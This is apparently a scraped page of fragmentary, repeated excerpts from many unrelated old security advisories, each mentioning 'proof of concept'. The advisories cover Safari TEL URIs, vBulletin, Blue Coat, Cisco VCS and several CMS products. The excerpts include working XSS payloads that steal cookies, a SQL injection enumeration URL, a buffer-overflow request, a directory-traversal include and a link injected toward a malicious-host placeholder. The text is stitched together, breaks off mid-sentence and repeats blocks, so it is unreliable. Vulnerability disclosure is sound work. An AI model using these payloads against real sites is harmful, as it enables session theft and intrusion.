<< Previous Next >>
proof of concept
This condition occurs if a TEL URI is activated at the same time
Safari is closed by launching an external application, for example
launching the SMS application (in order to handle a SMS URI [2]). The
SMS application can be launched through placing a SMS URI as the
source of an iframe. This is shown in the first proof-of-concept
exploit below.
Further investigation showed that this behavior can be reproduced by
launching other applications such as: Maps, YouTube, and iTunes.
Launching these applications can be achieved through loading special
>
> This condition occurs if a TEL URI is activated at the same time
> Safari is closed by launching an external application, for example
> launching the SMS application (in order to handle a SMS URI [2]). The
> SMS application can be launched through placing a SMS URI as the
> source of an iframe. This is shown in the first proof-of-concept
> exploit below.
>
> Further investigation showed that this behavior can be reproduced by
> launching other applications such as: Maps, YouTube, and iTunes.
> Launching these applications can be achieved through loading special
>>
>> This condition occurs if a TEL URI is activated at the same time
>> Safari is closed by launching an external application, for example
>> launching the SMS application (in order to handle a SMS URI [2]). The
>> SMS application can be launched through placing a SMS URI as the
>> source of an iframe. This is shown in the first proof-of-concept
>> exploit below.
>>
>> Further investigation showed that this behavior can be reproduced by
>> launching other applications such as: Maps, YouTube, and iTunes.
>> Launching these applications can be achieved through loading special
>>>
>>> This condition occurs if a TEL URI is activated at the same time
>>> Safari is closed by launching an external application, for example
>>> launching the SMS application (in order to handle a SMS URI [2]). The
>>> SMS application can be launched through placing a SMS URI as the
>>> source of an iframe. This is shown in the first proof-of-concept
>>> exploit below.
>>>
>>> Further investigation showed that this behavior can be reproduced by
>>> launching other applications such as: Maps, YouTube, and iTunes.
>>> Launching these applications can be achieved through loading special
SiteX CMS contains third-party scripts from FCKeditor. One of them is:
"includes/fck/editor/filemanager/upload/php/upload.php". This particular
script does not have any checks against user validity and anyone can try
to upload files to SiteX-powered website.
Here is proof-of-concept file for testing:
------------>[proof-of-concept]<-----------
<html>
<body>
<center>
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
[1] Private Reflected XSS:
An attacker can inject scripts in a simple way, which is only visible to the attacker.
Proof of Concept:
url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)
(This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)
[2] Global Reflected XSS:
An attacker can inject malicious CSS data executing javascript, which is then visible
Carvalho, from the Core Security Consulting Services (SCS) team of Core
Security Technologies during Bugweek 2007. Additional research was done
by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).
*Technical Description / Proof of Concept Code*
Three vulnerabilities discovered in the iCal application may allow
un-authenticated attackers to execute arbitrary code on vulnerable
systems with (and potentially without) the assistance from the end user
of the application or to repeateadly execute a denial of service attack
Since more then enough \..\..\ will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can
for example overwrite a critical system file, or create a file in the Autostart
folder.
See Proof of Concept exploit at the bottom of this advisory.
== Vendor status and solution ==
The vendor has been informed and has released a new version (7.02) with this
Model: Blue Coat SG400
Software SGOS 4.2.1.6
Software Release ID: 25173
Proof of concept #1:
https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00
Injected payload:
Having such modified file, the only thing to do is to convince somebody
to open it. This Denial of Service attack is not very harmful in fact,
although it's a typical header-based vulnerability, and is adviced to be corrected.
Proof of Concept: http://j00ru.vexillium.org/vuln/winimage/dos_PoC.IMG
2. Directory Traversal vulnerability
This vulnerability was discovered and researched by Francisco Falcon
from Core Security Technologies.
*Technical Description / Proof of Concept Code*
The WePO ActiveX component has a parameter named "mainurl" that
indicates the local file name or the URL from where to retrieve the
content to print:
arbitrary constant count. The player then parses constant values
(strings) from the string table, and continues reading null terminated
strings in the adjacent tag data, eventually reading from memory
adjacent to the Flash movie. References to these values are stored in
a table of constants that can be later accessed using a set of action
records. A proof of concept was developed and presented to the vendor
to demonstrate the threat of read beyond bounds issues to complex file
formats such as the SWF file format.
Finally, other issues were found that suggest the lack of validation
on the contents of the dictionary data structure. Elements in the
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. This causes a reboot on the Endpoints. The
VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but
it will restart the process itself which drops all calls.
Proof of Concept: GET
/wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n
Host: 192.168.6.99\r\n\r\n"
Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Technologies.
*Technical Description / Proof of Concept Code*
Internet Explorer is the most popular Internet browser in the world as
it is an integrated component of every Windows installation. It
introduces the concept of URL Security Zones, as explained in [2], which
basically define a set of privileges for web applications (such as
by performing basic binary analysis of the generated audio file. The
issue is compounded by the fact that even if the audio feature of the
CAPTCHA has been disabled, it can still be accessed by forceful
browsing to the /secure_play.php URI.
Proof of Concept.
Proof of concept code that works against the example_form.php page and
the MP3 file format provided with the standard PHPCaptcha package
available from www.phpcaptcha.org is available at:
http://www.senseofsecurity.com.au/advisories/SOS-11-007.zip
Embedded device management interface does not validate the origin
of an HTTP request. If attacker is able to make an authenticated
user visit a hostile web page, a device can be controlled by
submitting suitable forms. It is possible to steal information from
the device and modify the configuration. See provided
proof-of-concept code for more information.
Successful attack requires that the attacker knows the management
interface address for the target device. As the management interface
is most usually located at the default IP address and might even have
default password in place, performing an successful attack is not far
Carvalho, from the Core Security Consulting Services (SCS) team of Core
Security Technologies during Bugweek 2007. Additional research was done
by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).
*Technical Description / Proof of Concept Code*
Three vulnerabilities discovered in the iCal application may allow
un-authenticated attackers to execute arbitrary code on vulnerable
systems with (and potentially without) the assistance from the end user
of the application or to repeateadly execute a denial of service attack
Since more then enough \..\..\ will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can
for example overwrite a critical system file, or create a file in the Autostart
folder.
See Proof of Concept exploit at the bottom of this advisory.
== Vendor status and solution ==
The vendor has been informed and has released a new version (7.02) with this
issue being fixed.
from Core Security Exploit Writers Team. The publication of this
advisory was coordinated by Fernando Miranda from Core Security
Advisories Team.
8. *Technical Description / Proof of Concept Code*
This flaw is located in the hypervisor driver 'vmswitch.sys' of Windows
systems. The Proof of Concept showed in [Sec. 8.1] was tested on the
latest released version 6.1.7600.16701 of the above mentioned driver.
/*
Family Connection <= 1.8.2 - Remote Command Execution
Proof of Concept - Written by Salvatore "drosophila" Fresta
The following software will create a file (rce.php) in the
specified path using Blind SQL Injection bug. To exec remote
commands, you must open the file using a browser.
Technical Details:
Normal input for the 'LngId' parameter contains a code such as ENG, DEU, JP, denoting the language type. This parameter is not properly validated and the injection of SQL statements within it allows attackers unrestricted access to enumerate information from the database. For example:
https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
Proof of Concept:
A Proof of Concept (RDdbenum.py) has been developed to automate enumeration of entire database content available from http://www.irmplc.com/Tools/RDdbenum.py
Workaround / Solutions:
There are no known workarounds for this vulnerability
This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*
HP Openview Network Node Manager includes an embedded database engine
1) Cross Site Scripting (XSS) in Chyrp: CVE-2012-1001
1.1 Input passed via the "content" POST parameter to /includes/ajax.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/includes/ajax.php" method="post">
<input type="hidden" name="action" value="preview" />
<input type="hidden" name="feather" value="" />
1) Cross-Site Scripting (XSS) in Fork CMS: CVE-2012-1188
1.1 Input passed via the "type" and "querystring" GET parameters to /private/en/error is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demostrate the vulnerability:
http://[host]/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1
1.2 Input passed via the "name" GET parameter to /private/en/locale/index is not properly sanitised before being returned to the user.
problem related to Java SE security. Among a total of 19 weaknesses
discovered, there are issues that allow to either create a specific
Java security bypass condition or that facilitate the exploitation
process of a certain type of vulnerabilities.
Security Explorations developed reliable Proof of Concept codes for all
of the issues found. This includes 12 exploit codes that demonstrate a
complete JVM security sandbox bypass.
Malicious Java applet or application exploiting one of the most serious
issues found could run unrestricted in the context of a target Java
1.1 Input passed via the "language" GET parameter to upgrade.php is vulnerable to directory path traversal. The directory path passed to the "language" parameter is later used in include() function to include the following files: common.lang.php, admin.lang.php, install.lang.php and upgrade.lang.php.
Under certain conditions this can be exploited to include malicious PHP file and execute arbitrary PHP code. To exploit this vulnerability the attacker should create a file with the name from the list above (for example admin.lang.php) in the file system (for example in /tmp/) and try to include it via directory traversal.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/upgrade.php?language=../../../../../tmp/
/tmp/ directory should contain "admin.lang.php" file that will be used in include() call.
1) Multiple Cross-Site Scripting (XSS) in pragmaMx: CVE-2012-2452
1.1 Input passed via a name of a GET parameter to modules.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
1.2 Input passed via the "img_url" GET parameter to /includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
7. *Credits*
These vulnerabilities were discovered and researched by Jorge Luis
Alvarez Medina and Federico Muttis from Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
The bugs in this advisory as well as a number of specific methods to
combine them with insecure Internet Explorer features are discussed in
the paper "Abusing Insecure Features of Internet Explorer"[5].
Exploitation of these vulnerabilities as well as others disclosed
Note: Here was not possible a XSS attack
------------------
PROOF OF CONCEPT:
------------------
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>
This vulnerability was discovered and researched by Sebastian Muniz from
the Exploit Writers Team (EWT) at Core Security Technologies.
*Technical Description / Proof of Concept Code*
WonderWare SuiteLink is a service that runs on Microsoft Windows
Operating Systems listening for connections on port 5413/tcp.
Un-authenticated client programs connecting to the service can send a
<<Previous Next>>
|
